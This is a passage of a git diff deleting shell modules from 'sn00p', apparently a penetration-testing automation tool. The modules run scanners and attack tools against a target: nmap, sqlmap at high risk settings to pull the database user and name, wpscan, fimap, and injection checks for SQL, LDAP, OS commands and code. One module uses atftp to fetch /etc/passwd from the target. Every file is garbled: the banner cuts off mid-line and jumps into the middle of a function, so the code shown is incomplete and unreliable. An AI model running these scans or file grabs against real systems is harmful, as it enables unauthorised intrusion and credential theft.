HERE! ####################### - - -# connect and try to get infos about logged in users -# TOOLS: ike-scan -do_ikescan() -{ - opts="" - - ike-scan ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# probe ike requests and enumerate ike related stuff via IKEProber.pl -# TOOLS: ikeprober -do_ikeprober() -{ - opts="" - - ikeprober -d ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# capture authentication messages (aggressive mode IKE) via ikecrack-snarf -# TOOLS: ikecrack-snarf-1.00.pl -do_ikecrack_snarf() -{ - opts="" - - ikecrack-snarf-1.00.pl "${DHOST}.${DPORT}" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/513.sh b/automation/sn00p/source/src/modules/udp/513.sh deleted file mode 100644 index 45a2918..0000000 --- a/automation/sn00p/source/src/modules/udp/513.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get infos about logged in users -# TOOLS: rwho -do_rwho() -{ - opts="-a" - - rwho ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/53.sh b/automation/sn00p/source/src/modules/udp/53.sh deleted file mode 100644 index aa86ff1..0000000 --- a/automation/sn00p/source/src/modules/udp/53.sh +++ /dev/null 
@@ -1,131 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# dns -# TOOLS: -do_dns_default() -{ - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/69.sh b/automation/sn00p/source/src/modules/udp/69.sh deleted file mode 100644 index 99ea12f..0000000 --- a/automation/sn00p/source/src/modules/udp/69.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get passwd via atfp -# TOOLS: atftp -do_atftp_connect() -{ - opts="--verbose -g -r /etc/passwd -l passwd" - - atftp ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/default.sh b/automation/sn00p/source/src/modules/udp/default.sh deleted file mode 100644 index 4721f3d..0000000 --- a/automation/sn00p/source/src/modules/udp/default.sh +++ /dev/null 
@@ -1,167 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# read banner via netcat or at least do a connect -# TOOLS: nc -do_netcat_connect() -{ - echo -e "\n" | nc -vvu -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner via amap -# TOOLS: amap -do_amap() -{ - opts="-bqv -u -c 64 -C 2 -T 3 -t 3" - - amap ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner, do rpc scans, fingerprint and run NSE script via nmap -# TOOLS: nmap -do_nmap_banner() -{ - opts="-n -sUCV -sR -PN --version-all" - - nmap ${opts} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# connect via SSL and try to read -# TOOLS: openssl -do_openssl_connect() -{ - echo "" | openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/asp.sh b/automation/sn00p/source/src/modules/web/asp.sh deleted file mode 100644 index 05b4781..0000000 --- a/automation/sn00p/source/src/modules/web/asp.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan for common misconfigurations and info leaks in asp.net apps -# TOOLS: asp-audit -do_asp_audit() -{ - opts="-bf" - - asp-audit ${URL} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/default.sh b/automation/sn00p/source/src/modules/web/default.sh deleted file mode 100644 index 7ce3954..0000000 --- a/automation/sn00p/source/src/modules/web/default.sh +++ /dev/null 
@@ -1,152 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# map whole webapplication and do quick security scans -# TOOLS: golismero -do_golismero() -{ - opts="-e dns,dns_malware,fingerprint_web,punkspider,robots,spider" - opts="${opts} --full --no-color -q -o -" - - golismero ${opts} scan ${URL} 2>&1 - - return ${SUCCESS} -} - - -# just crawl the webpage and save website data for later usage (uwss modules) -# TOOLS: uwss.sh -do_uwss() -{ - opts="-q -c" - - # we do not need any log results. we are only interested in website data - # results will be saved under /tmp/uwss.dat - uwss.sh ${opts} -u ${URL} > /dev/null 2>&1 - - echo "crawled data with uwss" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/drupal.sh b/automation/sn00p/source/src/modules/web/drupal.sh deleted file mode 100644 index 15a4b07..0000000 --- a/automation/sn00p/source/src/modules/web/drupal.sh +++ /dev/null 
@@ -1,151 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# fingerprint drupal modules / versions -# TOOLS: DrupalScan -do_drupalscan() -{ - opts="" - - echo "DrupalScan against ${DHOST}" 2>&1 - DrupalScan ${opts} -u ${DHOST} 2>&1 - - echo "DrupalScan against ${URL}" 2>&1 - DrupalScan ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# drupal modules enumerator -# TOOLS: dpscan -do_dpscan() -{ - opts="" - - dpscan ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/finc.sh b/automation/sn00p/source/src/modules/web/finc.sh deleted file mode 100644 index e29d8fa..0000000 --- a/automation/sn00p/source/src/modules/web/finc.sh +++ /dev/null 
@@ -1,151 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# crawl and scan website for file inclusion bugs with fimap -# TOOLS: fimap -do_fimap() -{ - opts="-H -4 -b -v 1 -d 3" - - fimap ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - -# test for file inclusion bugs with uwss -# TOOLS: uwss -do_uwss_finc() -{ - opts1="-q -m lfi" - opts2="-q -m rfi" - - # local file inclusion - uwss.sh ${opts1} -u ${URL} 2>&1 - - # remote file inclusion - uwss.sh ${opts2} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/fingerprint.sh b/automation/sn00p/source/src/modules/web/fingerprint.sh deleted file mode 100644 index 50ffb90..0000000 --- a/automation/sn00p/source/src/modules/web/fingerprint.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# detect 'web application firewall' lol :) -# TOOLS: wafw00f -do_wafw00f() -{ - opts="-a" - - wafw00f ${opts} ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/fullaudit.sh b/automation/sn00p/source/src/modules/web/fullaudit.sh deleted file mode 100644 index 8ab8bf9..0000000 --- a/automation/sn00p/source/src/modules/web/fullaudit.sh +++ /dev/null 
@@ -1,177 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# crawl and scan webpage with wapiti -# TOOLS: wapiti -do_wapiti() -{ - opts="--module '-all,xss,crlf,sql,file,htaccess,blindsql,permanentxss' - -t 3 -f txt -o /dev/stdout" - - wapiti.sh ${URL} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# crawl and scan webpage with uniscan -# TOOLS: uniscan -do_uniscan() -{ - opts="-q -w -e -d -s" - - # no need to log uniscan output (uniscan report is enough) - uniscan ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# crawl and scan webpage with skipfish -# TOOLS: skipfish -do_skipfish() -{ - # note: default crawl depth level: 3 - opts="-u -i 5 -t 5 -d 3 -o ${URL}_skipfish" - - # no need to log skipfish output (skipfish report is enough) - skipfish ${opts} ${URL} > ${VERBOSE} 2>&1 - echo "skipfish has created own report, see ${URL}_skipfish/" - - return ${SUCCESS} -} - - -# crawl and scan webpage with arachni -# TOOLS: arachni -do_arachni() -{ - # note: default crawl depth level: 3 - opts="--user-agent=yomama --depth=3 --report=stdout" - - arachni ${opts} ${URL} 2>&1 - - return 
${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/joomla.sh b/automation/sn00p/source/src/modules/web/joomla.sh deleted file mode 100644 index 897c997..0000000 --- a/automation/sn00p/source/src/modules/web/joomla.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan for joomla vunerabilities, fingerprint etc. with joomscan -# TOOLS: joomscan -do_joomscan() -{ - opts="-g 'yomama'" - - joomscan ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/ldapi.sh b/automation/sn00p/source/src/modules/web/ldapi.sh deleted file mode 100644 index 46d6580..0000000 --- a/automation/sn00p/source/src/modules/web/ldapi.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for ldap injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_ldapi() -{ - opts="-q -m ldap" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/oci.sh b/automation/sn00p/source/src/modules/web/oci.sh deleted file mode 100644 index ff7362c..0000000 --- a/automation/sn00p/source/src/modules/web/oci.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for os command injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_oci() -{ - opts="-q -m os" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/rce.sh b/automation/sn00p/source/src/modules/web/rce.sh deleted file mode 100644 index bfdd6a0..0000000 --- a/automation/sn00p/source/src/modules/web/rce.sh +++ /dev/null 
@@ -1,136 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for remote code execution bugs with uwss -# TOOLS: uwss.sh -do_uwss_rce() -{ - # php and perl code execution - opts="-q -m php,perl" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/soapi.sh b/automation/sn00p/source/src/modules/web/soapi.sh deleted file mode 100644 index a464fcc..0000000 --- a/automation/sn00p/source/src/modules/web/soapi.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for soap injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_soapi() -{ - opts="-q -m soap" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/sqli.sh b/automation/sn00p/source/src/modules/web/sqli.sh deleted file mode 100644 index 64499c3..0000000 --- a/automation/sn00p/source/src/modules/web/sqli.sh +++ /dev/null 
@@ -1,148 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# test sql injection for single url with sqlmap (GET only!) -# TOOLS: sqlmap -do_sqlmap() -{ - opts="--user-agent=yomama --timeout=5 --retries=2 --level=2 --risk=3 - --time-sec=3 -f --current-user --current-db --hostname --threads=4" - - sqlmap ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# scan website for sql injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_sqli() -{ - opts="-m sql -q" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/wordpress.sh b/automation/sn00p/source/src/modules/web/wordpress.sh deleted file mode 100644 index d4e8eeb..0000000 --- a/automation/sn00p/source/src/modules/web/wordpress.sh +++ /dev/null 
@@ -1,149 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# fingerprint wordpress version -# TOOLS: plecost -do_plecost() -{ - opts="-i wp_plugin_list.txt -s 5 -M 10 -t 8 -o /dev/stdout" - - plecost ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan wordpress (enumerate vuln plugins and themes, etc.) -# TOOLS: wpscan -do_wpscan() -{ - opts="-f -t 8 --wp-content-dir wp-content" - - # echo, because wpscan is asking for plugin dir interactively, - # if not found (yes, 'yes' is available, fuck that...) - echo -e "y\r\n" | wpscan.sh ${opts} -u ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/xmli.sh b/automation/sn00p/source/src/modules/web/xmli.sh deleted file mode 100644 index c85acc5..0000000 --- a/automation/sn00p/source/src/modules/web/xmli.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for xml/xpath injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_xmli() -{ - opts="-q -m xml" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/xss.sh b/automation/sn00p/source/src/modules/web/xss.sh deleted file mode 100644 index eae8544..0000000 --- 